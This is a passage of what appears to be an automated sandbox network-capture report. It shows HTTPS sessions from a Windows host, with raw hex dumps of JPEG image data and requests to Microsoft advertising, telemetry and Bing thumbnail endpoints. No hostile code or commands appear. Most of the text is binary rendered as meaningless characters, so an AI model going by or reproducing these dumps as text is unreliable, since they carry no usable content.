                                                                                                                                                                                                            2024-11-21 14:17:21 UTC16384INData Raw: 4b b9 35 28 a5 d8 96 f6 f2 fc f1 79 5f ee 57 35 f0 67 4f d7 74 fb 4b ef 14 5f 4d 0d ef da 34 57 fb 4f 9b fe ba e2 2f b1 bc 71 24 3f df 85 37 ff 00 bd df e6 ad ef d9 eb 5a d2 7c 57 ab 47 e1 0b 5f 27 fb 37 5a d1 74 db bb 9b 6b 9f f9 67 e4 7c b3 c0 bf ed 7a 53 b5 9b 66 9b c8 de f8 49 a8 5a 5c 78 b3 5b 82 d6 ce 6d 3a 3f ed 27 83 52 b6 96 2f f5 72 ec f3 23 6f fb 69 52 78 c7 5e 91 3e 2f 5c bd ac 33 49 ff 00 08 ae 8b 67 fe ab fe 7a cb 37 ff 00 13 5c 5f 89 a7 d4 ad 2f 3c 6d e2 fb 5d 4b fd 17 fb 7e ce ee e7 ca f9 3e d1 e5 f9 8b fb bf fa 6d e5 ad 61 dd 78 e3 5d d5 7e 16 f8 93 c5 10 43 0d bf 99 1b df db 5c c5 f7 3e cf 17 c9 02 37 fb 5b 63 a7 6b 89 bd 2c 7a 37 c3 5d 43 fe 24 7e 3a f1 2b d9 c3 a8 c7 e2 af 14 3d bc 71 c5 f7 fc a8 36 5b b2 fe 15 b9 22 c9 e1 cb b9 1e ca
                                                                                                                                                                                                            Data Ascii: K5(y_W5gOtK_M4WO/q$?7Z|WG_'7Ztkg|zSfIZ\x[m:?'R/r#oiRx^>/\3Igz7\_/<m]K~>max]~C\>7[ck,z7]C$~:+=q6["
                                                                                                                                                                                                            2024-11-21 14:17:21 UTC16384INData Raw: ff 00 52 fb 75 ff 00 c9 3e e4 54 7f bb fd da 8e 44 de a1 ce e3 1b 1d 17 80 fe 23 69 b1 7c 27 d2 7c 28 f6 7f db 57 da 56 93 ac 41 17 ef 76 43 61 2c bb 21 5b 86 7f f3 bb 7d 58 fd 9e df c0 ff 00 f0 87 e9 30 eb 43 ed 97 ba 0e fb 8b 8b 1b ef bf f6 d5 7d b1 40 ab fc 08 5b e7 ac 3f 0e d8 f8 7f e1 97 c5 8f ec c3 a6 da ea da 04 b2 d9 c9 2c 77 51 7f cb c3 27 ee fe 6f f9 e5 bb ef 57 ad 7c 3d b3 d3 6f 75 0f 1b 6a f7 5a 3e 87 1c 9a 76 b5 79 f6 9f dd 7e e6 ed db ee 7b fc 95 4d 24 85 1b df 53 bc d0 ff 00 e1 1e b8 d0 fc 3f 75 a8 ea 5f 68 be f2 fe cf a9 5c c5 2e cf b4 5e cf fb c8 55 bf d9 4e d5 d9 6a 92 d8 45 a1 db 69 76 bf eb 35 5b df b0 5b 49 e6 ef f2 d3 fe 5a c8 9f f0 1d f5 e4 1f 07 7c 2f a4 ea 7a 4d ce 96 9a 0f 99 26 95 6c fa 9f 99 f6 b7 49 a4 7f ee f5 c7 cb 5e a1 e1
                                                                                                                                                                                                            Data Ascii: Ru>TD#i|'|(WVAvCa,![}X0C}@[?,wQ'oW|=oujZ>vy~{M$S?u_h\.^UNjEiv5[[IZ|/zM&lI^
                                                                                                                                                                                                            2024-11-21 14:17:22 UTC16384INData Raw: 2e a6 52 c3 b8 ad b4 39 08 ee 75 af 0f f8 36 e7 57 f0 84 d0 de f8 66 e2 e7 ec f7 ba 05 cc bf be f0 ec ac ff 00 ea 92 4f e0 8d bb ff 00 76 ba 8f 88 56 9a 2f c4 5f 84 fa 96 8b a7 cd f6 3b e9 2d 9e 3b 6b 69 7f 73 71 69 2a a7 ee fe 4f ee bd 6a 78 83 c2 1a 2d a6 b9 73 ab da eb 17 76 f7 56 f7 29 71 1d ec 52 ef 7d 9b 3e 7d df c3 2e 64 fe 17 ae 3f 5c f0 f7 89 7c 29 77 6d 75 75 34 31 dd 5b c7 f6 88 ef 6c 62 ff 00 8f 4f 33 ee 5b f9 7f 7d 17 fe 99 fc c9 57 ed 93 76 46 72 a0 e2 9a 6b 43 27 e1 37 c4 6d 46 cb e1 fd be a1 e2 38 7c cd 7a ca cb ec 92 79 b2 fc f2 79 4f b7 6f fd 75 2f f2 32 d7 6d e1 5d 3f 52 b4 bb d1 3f 73 fb ff 00 ed 6f b4 5e dc dc fd fb bb a9 e1 3e 62 ee fe ea fd d1 fd da f0 1d 03 5d 9f 47 f1 de b5 77 e3 81 16 8d 07 98 9a de 9d fb d4 9b ec fa a4 ff 00 2c
                                                                                                                                                                                                            Data Ascii: .R9u6WfOvV/_;-;kisqi*Ojx-svV)qR}>}.d?\|)wmuu41[lbO3[}WvFrkC'7mF8|zyyOou/2m]?R?so^>b]Gw,
                                                                                                                                                                                                            2024-11-21 14:17:22 UTC16384INData Raw: df c0 2b a8 f8 e9 e2 1b bb 1f 0c ff 00 c2 15 fb ed 3a d6 de 3b 6b fb 2b 2b 98 bf d5 dc 37 fa ef fb 65 fd da ce 51 4e a2 7e 77 35 8d 4e 58 69 d8 e0 3c 41 2f 95 77 26 bd 6b 0f d9 e0 8e e7 fd 1b cd 97 7b c9 ff 00 3c a0 6f ef 2a f7 ae 72 fa f2 7b a8 75 2b a7 f2 7e dd 71 fb cb 98 ed be 4f 9e 47 dd f2 ff 00 b3 51 78 7f 4f f1 66 a7 69 27 88 7f b3 66 b8 d2 ac ae 7c b9 24 f3 7f 8d bf bb 51 47 a9 5a 1f 07 5c ea 6f e5 5b a5 cc af fb af f9 e7 fc 3f f0 2a e8 e6 8f 73 96 cd 6e 7d 4b f0 2f 4f 8f e1 a7 c2 7b 6f 17 6a fe 1b d2 75 1f b6 69 b3 5e 47 7b 7d 16 fb 9f 35 51 3f d5 ff 00 b1 b6 bc 9f f6 7a d2 2e 3c 57 e2 1f 1b 78 f3 c5 16 7e 65 ae a3 a4 de 7d 8a db ee 7f a5 48 9f 2b 47 ff 00 5c 97 ad 72 7e 3f f1 64 fa c7 c2 dd 13 40 f0 f4 d7 9f 65 b2 b2 86 39 3f 7b fd df f5 bb 1b
                                                                                                                                                                                                            Data Ascii: +:;k++7eQN~w5NXi<A/w&k{<o*r{u+~qOGQxOfi'f|$QGZ\o[?*sn}K/O{ojui^G{}5Q?z.<Wx~e}H+G\r~?d@e9?{
                                                                                                                                                                                                            2024-11-21 14:17:22 UTC16065INData Raw: b0 fd de f4 dd f2 b7 35 f5 27 87 74 df 08 4b a1 d9 5f 59 59 c3 e5 c7 70 90 5b 47 e6 ff 00 a8 f9 ff 00 8d 9b ef 36 ef 99 b7 57 9b fe d3 3a 6f 83 3e 29 7c 3e d4 74 5b 59 6e b5 2d 63 cb f3 34 9b db 6b 5d fe 5d d4 7f f4 db fb bf de ad f0 ed 73 a5 25 74 65 88 4d c5 ca 2e d2 34 de f7 e2 0e 83 e1 fd 03 42 d1 34 dd 27 55 9e de c9 2c 3c df b2 4d 69 f7 93 77 de dd f3 fc df 31 db 58 97 a3 e2 83 69 f6 28 fe 36 f0 46 8d 63 a8 dc 3f 9b 6f 6d 69 35 9d ba 33 3f cc a9 3b e7 ef 7d cf 97 e6 ae 4f c0 3f 16 3c 41 e2 2f 0f e8 1a a6 b5 e2 ad 12 39 a4 d2 6e 63 d4 63 96 d3 f7 da 64 f0 6f 87 fe fa 6f f5 95 e8 b7 5a 5b ea 1a 2d 94 5e 45 d4 9a 7f 99 0b e9 d7 de 29 d8 96 e9 2f ca be 65 9e 9f eb cf fc b5 a9 95 17 4e 57 92 43 8d 68 ca 3e e3 67 91 da ff 00 c2 29 f0 eb 58 bd d3 bc 5b a3
                                                                                                                                                                                                            Data Ascii: 5'tK_YYp[G6W:o>)|>t[Yn-c4k]]s%teM.4B4'U,<Miw1Xi(6Fc?omi53?;}O?<A/9nccdooZ[-^E)/eNWCh>g)X[
                                                                                                                                                                                                            2024-11-21 14:17:22 UTC16384INData Raw: a6 c5 56 6f f7 7e 7a cd f1 c7 87 3c 43 16 ad ad a5 d6 9b 69 f6 af 0c de c3 e5 dc db 4b f3 c9 14 ef b9 62 ff 00 6d b7 f4 ae 0f e0 b5 9f 89 5f 5c d2 6d 67 d4 a6 b2 d4 b5 ad f7 f1 de df 7c e9 b3 67 cb f7 bf 89 55 79 af 6e f0 af 91 f1 0f cc 7b db cb 4d 3a fa e2 f6 da e2 3d 5a 28 b7 ff 00 a4 79 de 56 cf 9f d1 61 e7 fd fa a9 25 17 a1 11 7c c8 af f1 52 db c4 3e 1c f0 f4 9a f7 f6 c4 37 13 c7 65 34 7a d5 b5 b4 bf 3d df da 7e 58 f6 ff 00 0a d7 9e 7c 46 d3 20 d3 ff 00 67 bf 06 dd 41 a9 7d b6 ea df ce b4 d4 b4 d9 7f e5 de 59 3f 7a b5 d7 fc 70 b9 bf f1 5f c4 8f 0f f8 5e 0b c8 6d ef a3 fb 4d de a5 a9 45 fe a7 cd f2 52 4a e2 7e 23 68 b7 7a 67 f6 22 4f a9 5d c7 fd a3 fe 9f 27 da 7f 7d f6 74 54 db fa 7f 76 94 57 51 d4 7b 9e 1d e1 5f 12 c9 e1 7f 1e 47 b2 cf ed b1 de c6 fe
                                                                                                                                                                                                            Data Ascii: Vo~z<CiKbm_\mg|gUyn{M:=Z(yVa%|R>7e4z=~X|F gA}Y?zp_^mMERJ~#hzg"O]'}tTvWQ{_G
                                                                                                                                                                                                            2024-11-21 14:17:22 UTC16384INData Raw: 10 dc 25 85 94 5e 1f d6 92 6b 7f 22 3f 9d ff 00 71 27 fa bf bb fc 54 38 a7 ad 8d 23 37 d7 46 61 eb 1f 11 b5 ab 4f 89 9a 94 1a 77 95 a8 ea 3a ac 7a c5 de 9b a7 4b a7 ef 4b 4b dd 91 7f ae 8a 4c 22 22 aa 79 a5 eb 7f c2 5a 1e 85 e0 df 10 e8 9a 0e 97 67 ab 5e ff 00 6a dc a7 88 ae 64 b9 d3 ff 00 7d e6 c7 0f cf 2c ad 27 fc f5 9f e6 44 ae 2b c6 9e 3d f0 a6 99 fb 49 f8 83 5d f1 09 f1 35 96 a9 a7 69 d0 e9 9a 74 52 44 97 72 c6 ea eb 24 cf 36 cf dd bf 99 fd da 97 c4 df 13 ef fe cb e1 bd 7b 54 d1 ee f5 1f 11 db c9 37 db 6f 6e 65 fb 1d 8d c7 9a ff 00 e8 6d bf fe 59 b4 6d ff 00 2c 69 b8 b7 1b 58 51 92 bb bf 43 d5 74 ad 47 5d d3 fe 20 d8 f9 3a 96 93 a7 c7 a0 eb 5a af db 6c b5 69 7f e3 d2 de 58 51 d6 da 4b 85 f9 3c d9 1b f7 a1 16 a7 fe d5 b8 f8 a1 a8 c7 a2 4f a6 cd 25 af
                                                                                                                                                                                                            Data Ascii: %^k"?q'T8#7FaOw:zKKKL""yZg^jd},'D+=I]5itRDr$6{T7onemYm,iXQCtG] :ZliXQK<O%


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            30192.168.2.64973820.234.120.54443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:21 UTC603OUTGET /v1/a/impression?CID=128000000001615609&region=CH&lang=EN-CH%2CEN-GB&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.19041.1023&mo=&cap=&EID=&&PID=426081542&UIT=M-&TargetID=1&AN=1868311687&PG=PC000P0FR5.0000000IRU&REQASID=F40D71FD2D2F41BCA7C5C4D26E91B507&UNID=338389&ASID=b4854a4670964a30867ebc7644e57121&&DS_EVTID=F40D71FD2D2F41BCA7C5C4D26E91B507&DEVOSVER=10.0.19045.2006&REQT=20241121T141705&TIME=20241121T141710Z&ARCRAS=&CLR=CDM HTTP/1.1
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                            User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                                                                                                                                            Host: ris.api.iris.microsoft.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            2024-11-21 14:17:21 UTC183INHTTP/1.1 204 No Content
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                            request-id: cb5862fa-4f3a-41cc-b2de-fc899debd865
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:21 GMT
                                                                                                                                                                                                            Connection: close


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            31192.168.2.649741150.171.28.10443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:21 UTC346OUTGET /th?id=OADD2.10239339388108_1KZ6HVDK2OYWY9XA8&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                            Host: tse1.mm.bing.net
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            2024-11-21 14:17:22 UTC854INHTTP/1.1 200 OK
                                                                                                                                                                                                            Cache-Control: public, max-age=2592000
                                                                                                                                                                                                            Content-Length: 595646
                                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                            Access-Control-Allow-Headers: *
                                                                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                                            Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                            NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                            X-MSEdge-Ref: Ref A: BC2CBD82AE314376989D3C85363F5F4C Ref B: EWR30EDGE0718 Ref C: 2024-11-21T14:17:22Z
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:21 GMT
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            2024-11-21 14:17:22 UTC15530INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 17 fc 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 33 2e 35 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 32 3a 31 30 3a 30 33 20 31 31 3a 35 31 3a 30 30 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 04 38 a0 03 00 04 00 00 00 01 00 00 07 80 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01
                                                                                                                                                                                                            Data Ascii: JFIF``ExifMM*bj(1r2i``Adobe Photoshop 23.5 (Windows)2022:10:03 11:51:008
                                                                                                                                                                                                            2024-11-21 14:17:22 UTC16384INData Raw: 8f ad 2e e3 f6 28 e4 23 b1 91 ff 00 e9 9d 1f 63 93 f8 21 ae b6 4d 2b fb ff 00 f2 ce 9b fd 9f fb 9f 9e 8f ad 2e e0 e8 a3 91 92 ce 4a 3e c3 5d 87 f6 64 9f 7e a2 9f 4a 7f e0 a7 f5 b5 dc 9f 63 7e 87 21 25 9d 43 f6 3f e0 ff 00 96 75 d7 49 a6 6f f9 2a 19 34 af e3 4a b5 8a 5d c9 f6 09 9c ac 96 7f b9 a6 fd 9b 67 cf 5d 47 f6 66 ca 64 9a 54 95 4b 12 bb 8b d8 1c bf d9 bf ef e5 33 ec 75 d3 49 a5 49 ff 00 6c e9 bf d9 b2 55 c7 14 bb 91 ec 4e 67 ec d2 53 7e c7 5d 2f f6 64 89 4d fe cf 92 af eb 08 3d 89 cf 7d 97 67 dc a6 fd 9b 64 d5 bd 26 9f 50 fd 86 44 fb 95 4b 10 4f b0 31 fc 8f ee 51 24 55 b1 f6 1d 95 14 96 7b 2a bd b2 25 d2 68 ce f2 bf 81 e8 91 76 55 cf b1 ec a2 4b 6a 7c e8 9e 49 14 e4 a6 bd 5f f2 24 f2 7e 7a 8b c8 fe 3a 14 d0 72 48 a5 f7 fe 7a 7c 6b b2 1a 93 c8 d9 0d
                                                                                                                                                                                                            Data Ascii: .(#c!M+.J>]d~Jc~!%C?uIo*4J]g]GfdTK3uIIlUNgS~]/dM=}gd&PDKO1Q$U{*%hvUKj|I_$~z:rHz|k
                                                                                                                                                                                                            2024-11-21 14:17:22 UTC16384INData Raw: d5 79 22 d9 37 cf 42 92 7b 13 ca d1 57 6f ee 7e 4f de 53 76 ec f9 ff 00 e5 9d 58 f2 bf 8d e8 db be a8 8b 14 b6 fe e6 8d bf f3 d2 ad 79 5b 2a 2d bf be d9 5a 11 66 8a fb 7f 73 51 fd ff 00 9d 3f e5 9d 4f 23 7f df ba 64 71 27 9d 41 99 1f ef 3f 8e 8f bb 35 3a 45 a6 c8 bb 3e 7a a0 19 27 c9 4c ff 00 d1 75 34 8b b2 1f 9f fd 65 32 4f 31 e1 aa 15 c8 b6 fe fa 8a 28 db be 96 a2 1b ff 00 5d 29 91 ad 4b 25 37 ee fd ca a4 ae 04 32 7f e4 3a 29 fb e8 d9 4f 94 06 7f d3 3a 6f fb 6f 4e 91 7f bf 43 d3 4a c4 ee 88 e4 f9 e8 8f e4 fb f4 ed b4 dd df c1 4b 94 90 a6 7f e8 14 bc d2 22 ec a9 00 fb 90 d1 47 dc a2 b4 2b 94 eb 76 fe e6 99 27 cf f2 53 e4 5f df 6f a3 ca d9 f7 ff 00 d6 55 12 73 9f 15 22 f3 7e 1e df 27 9d 34 7f bc 4f f5 55 b7 6a bb 34 9b 24 4f f5 71 db 43 ff 00 a0 55 1f 1f
                                                                                                                                                                                                            Data Ascii: y"7B{Wo~OSvXy[*-ZfsQ?O#dq'A?5:E>z'Lu4e2O1(])K%72:)O:ooNCJK"G+v'S_oUs"~'4OUj4$OqCU
                                                                                                                                                                                                            2024-11-21 14:17:22 UTC16384INData Raw: df 2b 7d 68 f9 55 07 95 27 f1 ff 00 cb 4a 7c c0 e9 b2 ae dd ff 00 22 7f ac a6 f9 5f f7 ee ae 79 5b 28 92 3a 39 98 fd 97 91 4e 45 fd cf cf 50 c9 14 89 f3 d6 97 95 fd fa 6f 95 27 f0 51 cc 47 b1 66 7e dd ff 00 3d 37 ca fe 07 ab f2 45 ff 00 3d 29 92 45 57 19 a1 7b 36 51 8d 68 f2 bc da b9 24 51 ff 00 db 4a 36 c6 ff 00 7e ab 98 9f 66 ca 7e 57 ef be 4a 67 95 fb ad f5 7f ca d9 35 36 48 bf bf 4b da 20 f6 6c a5 24 54 46 bb 26 ab 52 47 27 fd 74 a6 47 07 ef be 7f f5 95 5c cb b8 3a 6d 15 76 ff 00 05 0e b2 55 df 2a 37 ff 00 ae 94 c9 3c c7 8b e4 ff 00 96 74 94 93 17 23 2a f9 51 fe ef 65 12 45 56 fc aa 3c aa a5 24 1c 8c a5 22 ff 00 03 d3 bc ad f5 77 ca 8d fe 4a 67 91 27 f1 d1 cc 83 91 95 7c af e3 4a 6f df fb 95 7f ca df 37 c9 35 32 38 b7 fc 94 f9 d0 dd 36 55 db fd ca 36
                                                                                                                                                                                                            Data Ascii: +}hU'J|"_y[(:9NEPo'QGf~=7E=)EW{6Qh$QJ6~f~WJg56HK l$TF&RG'tG\:mvU*7<t#*QeEV<$"wJg'|Jo75286U6
                                                                                                                                                                                                            2024-11-21 14:17:22 UTC16384INData Raw: f1 35 bc 5e 64 7e 5f c8 97 0b fd c7 a8 be 13 f8 e3 4d f1 47 85 34 ed 42 d6 5f f8 9a 5c 5e bc 7a 8d 94 7f 7e d1 e9 ca 9c ad cc 28 4d 46 e9 ee ee 77 9e 19 1b 1b 51 74 ff 00 96 97 15 72 66 8e 5f 33 4e f3 7f 79 24 75 43 c3 fe 5c 5f 6d b3 83 fe 59 dc 7f e8 54 d8 e5 82 5f 19 79 09 fe b2 3b 7f de 54 45 68 36 af 26 cc ad 7a 74 d3 6c 22 b6 d5 af 3e cf 73 1c 89 1e 9d 7b ff 00 3d 3f d8 6a e6 b4 1f 12 e9 da 56 b9 a8 e9 7a ee 91 2c 9a dc 77 09 98 ed bf e3 df f7 95 dc f8 ff 00 44 b0 f1 37 83 ef 74 5d 52 2f 32 09 3e 7f f6 d3 6f f1 2d 7c f5 f0 c2 ef c4 3f 0e 3f 69 2f f8 42 bc 63 ac 7f 6d 69 7e 26 b6 49 f4 ed 46 48 bf d4 79 5f f2 cd ab 68 51 52 4d 2d cc fd af 2d 93 5a 3e c7 ad ea 1a 1c 11 45 7b a9 e9 10 e9 f6 ff 00 68 1f f1 32 d1 a5 f9 d3 fd ea e5 7c 6b 14 fe 1a d6 f4 9d
                                                                                                                                                                                                            Data Ascii: 5^d~_MG4B_\^z~(MFwQtrf_3Ny$uC\_mYT_y;TEh6&ztl">s{=?jVz,wD7t]R/2>o-|??i/Bcmi~&IFHy_hQRM--Z>E{h2|k
                                                                                                                                                                                                            2024-11-21 14:17:22 UTC16384INData Raw: a6 da de ea 5a 7f 8a a7 d4 6c bf e2 63 f6 6f 9e 68 d9 bf d9 ad 24 b9 51 8c 60 aa 3b 49 d9 10 7c 0c f1 bd bf c4 8f 87 3e 1b f8 47 e1 4d 33 fb 38 e8 b2 7d bf 5a 32 ff 00 c7 bc 88 9f c4 d5 ec ff 00 16 34 af 0f 6a be 0d fe d4 d5 f5 ef b4 6a 52 49 e5 e8 b7 31 7c 89 61 fe ed 7c 73 f0 a3 e2 17 85 fe 1b fe d0 92 6a fe 1e f3 a4 f0 ce a3 fb b9 23 b9 ff 00 96 71 35 7d 4b e3 cf 88 3f 0b b5 bf 06 db 69 de 10 f1 26 9f aa ea b2 7f c7 95 94 5f f2 cd ff 00 fa d5 85 4a 6e f7 5d 4e dc 3d 44 e0 ee f5 46 a6 87 e2 cf 1d d9 68 72 27 8d 6c ff 00 b6 b4 78 ec bc b9 35 6d 36 2f 9e 0f f7 96 be 4b fd aa 3e 26 ff 00 c2 6d 77 a2 7f 60 c3 15 9e 9b a0 ef 82 ca e7 fe 5b 5c 3f f7 ab de 3e 38 7c 48 8f c3 fe 13 d3 7e 14 78 53 c4 9f da 3a ae b3 b2 4f 11 de d8 c5 bd 2c 22 fe 38 ff 00 de af 02
                                                                                                                                                                                                            Data Ascii: Zlcoh$Q`;I|>GM38}Z24jjRI1|a|sj#q5}K?i&_Jn]N=DFhr'lx5m6/K>&mw`[\?>8|H~xS:O,"8
                                                                                                                                                                                                            2024-11-21 14:17:22 UTC16384INData Raw: 7f b4 c7 2f c8 96 92 ff 00 b1 5d 14 e6 e3 2b 9c b5 29 a6 b9 4f cf 4f 0d 6b 17 7e 18 d7 2d af ec e5 96 39 ed e4 de e6 33 fe b9 6b ec af 83 be 02 f1 2f fc 23 da 4f 8f 27 d6 2d 2e 27 d7 b7 c9 65 73 2c bf b9 d3 3f e9 9c d5 f2 6f c6 cf 87 d7 ff 00 0e 3e 23 ea 5e 0f d5 e6 fd f6 9e 7f 77 27 fc f4 5a fb 63 c3 f7 32 6b 7f 05 fc 0b e0 af 03 43 0d e4 97 16 49 27 8a 24 8b fd 4d a5 bf f7 9f fd aa da 6d b8 dd 1c d8 54 d3 71 91 d2 f8 53 e2 0c 7e 22 f1 67 85 fc 29 a9 c3 0e a1 e2 3d 2e f5 d2 e6 e6 2f 9e 14 8b e6 ff 00 57 59 9f b4 d7 c4 bd 37 c1 fe 13 b9 f0 6e 8f a6 ff 00 68 f8 b6 e2 37 8f 4d fb 37 ce f6 e9 b3 e7 79 3f bb 5e 55 e3 cd 43 4d d3 fc 59 a2 78 43 e0 c5 e4 d1 f8 aa e2 e5 e3 92 f6 5f b9 69 07 f1 c9 5d e6 9f e1 8f 05 fc 37 f8 7b 1d f5 8f 88 e1 d7 75 8d 5a f5 23 d4
                                                                                                                                                                                                            Data Ascii: /]+)OOk~-93k/#O'-.'es,?o>#^w'Zc2kCI'$MmTqS~"g)=./WY7nh7M7y?^UCMYxC_i]7{uZ#
                                                                                                                                                                                                            2024-11-21 14:17:22 UTC16065INData Raw: 49 75 75 af 4d 6f 1c 71 f9 9f 62 8a ab a7 83 b4 5d 57 4f b9 7f 0f 68 fe 5d d4 7b ff 00 d2 7c dd 9f 68 7f f6 bf bd 4e 32 77 2a 51 5c a7 88 e8 7e 31 f1 2f 89 62 be f8 23 f1 26 6d 3e df c4 7a 0d cc 37 16 5a b4 b1 6c 4d 4e d6 3f ba a9 5d cf c5 9d 7a c7 57 87 c1 30 4f e1 c3 6f f6 8d 49 12 4d 38 c5 fe b3 62 6c de b5 e3 df b4 b7 80 f5 ed 6b c3 36 5a d4 f3 5a 7f c2 53 a3 4a ff 00 67 d5 6d a6 fe 15 ff 00 97 77 5a d6 f8 6b f1 b7 59 f8 a1 f1 3b c2 70 cd 67 fd 95 3f 85 6c b6 6a 5e 5c 5e 77 96 ff 00 df f9 6a dc 5d ee 72 39 59 f2 9f 3d fe dc 1a 2b e8 ff 00 b4 56 ad 04 1f bb 8e e3 f7 95 e2 f7 17 77 4b 6b b2 1f 37 f7 7f eb 24 af a1 bf 6c bb 9d 4a e3 e2 f7 da b5 4b cf b6 fd 9e db fd 65 cc 3b 3e d0 9f f0 2a f2 6f 03 dd 69 ba 9f 8d f4 04 7d 1a 2d f2 6a 28 86 3f e0 93 e7 fb
                                                                                                                                                                                                            Data Ascii: IuuMoqb]WOh]{|hN2w*Q\~1/b#&m>z7ZlMN?]zW0OoIM8blk6ZZSJgmwZkY;pg?lj^\^wj]r9Y=+VwKk7$lJKe;>*oi}-j(?
                                                                                                                                                                                                            2024-11-21 14:17:22 UTC16384INData Raw: 0b fb 3e db c3 5e 28 9b ec fa e4 7f bb 92 48 bf d4 ef 5a 65 af 8a 2d 2f 7c 1b ab 5a da c3 37 f6 95 cd cf fc f2 df ff 00 02 a8 b5 2d 43 e1 06 a1 e6 69 0f 67 35 eb d9 7f cb 4b 68 9f ce ae 66 c7 55 d4 b4 4d 72 48 7e 11 68 3a e5 c6 b1 ff 00 3c f5 2d 9f 66 8d 3f da aa 8a 4f a1 94 a5 65 dc bb e2 0f 15 78 87 53 d7 3c 2f a5 ea 3a 3f d9 ee b4 eb 9f f8 f9 ff 00 9f 8f ee d7 57 f1 1b fe 13 39 7f d3 60 d0 7e d1 7d a7 7f a4 47 e6 ff 00 a9 8d 2a 94 3f 0f be 23 6a 1a 1c 91 ea 9e 2a d2 6d ee af 7f d2 24 8e 28 9f fd 1d da b3 af b5 cf 8c ff 00 0e b4 39 2c b5 7f ec ff 00 17 ff 00 cf 3f ef c9 15 56 97 b2 1f 43 9e d1 fe 20 c9 f0 df c5 92 5d 5a f8 56 ee 4f 0a f8 8a 3f b4 5c db 7f cf bd c3 7c bb d3 fd 8a eb e4 ff 00 84 df 4f d5 bf e1 21 d1 75 2d 26 ca d6 e2 3f 33 ca 8a 5d ff 00
                                                                                                                                                                                                            Data Ascii: >^(HZe-/|Z7-Cig5KhfUMrH~h:<-f?OexS</:?W9`~}G*?#j*m$(9,?VC ]ZVO?\|O!u-&?3]
                                                                                                                                                                                                            2024-11-21 14:17:22 UTC16384INData Raw: 34 8f 3b fb 03 c5 5a 6c 3f f1 31 b6 ff 00 53 a4 5d 32 7f e3 a9 5a 9e 22 d3 e4 f0 5f 85 ee 3c 02 75 19 b5 cb 59 77 dc 7f 6a c7 f7 fc d6 4f ba ff 00 ec d3 6d a6 17 5a 1c 37 c3 2f 89 1e 25 f8 8b 0f f6 8f 8b fc 61 f6 7d 37 ec cf 1f d9 ac 62 4f 3b 7f fb 75 e8 7f b3 ea ea da c4 32 a4 df 10 b5 0f 32 ca e7 cb b6 8e 2d 9b 3e cf ff 00 03 af 9a be 00 e8 3a b6 95 e3 cd 6f 48 82 f2 1b 79 35 5b df 2f cc b9 f9 d2 bd b7 fb 0f c4 be 14 f1 35 8c 3a a7 d9 3e dd f6 9f f4 29 2d a5 de 97 1b 68 96 c3 86 c7 7f fb 44 7c 39 d0 bc 4b e0 ef b6 f8 87 51 bb d5 67 b7 b9 f2 ed a5 b9 89 36 5b d7 19 e2 7f 85 d1 fc 3f f0 7c 9a b7 84 3f b4 2f 3c 1f ff 00 31 6d 26 db 63 cd 1b 7f cf 74 af 46 be f1 2e bb e2 5b 5f 27 54 d1 fe c5 7d a3 48 92 47 a4 cb ff 00 2f 1f ed d7 75 a7 aa 5a 08 e4 8f 50 8a
                                                                                                                                                                                                            Data Ascii: 4;Zl?1S]2Z"_<uYwjOmZ7/%a}7bO;u22->:oHy5[/5:>)-hD|9KQg6[?|?/<1m&ctF.[_'T}HG/uZP


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            32192.168.2.64974313.107.246.45443
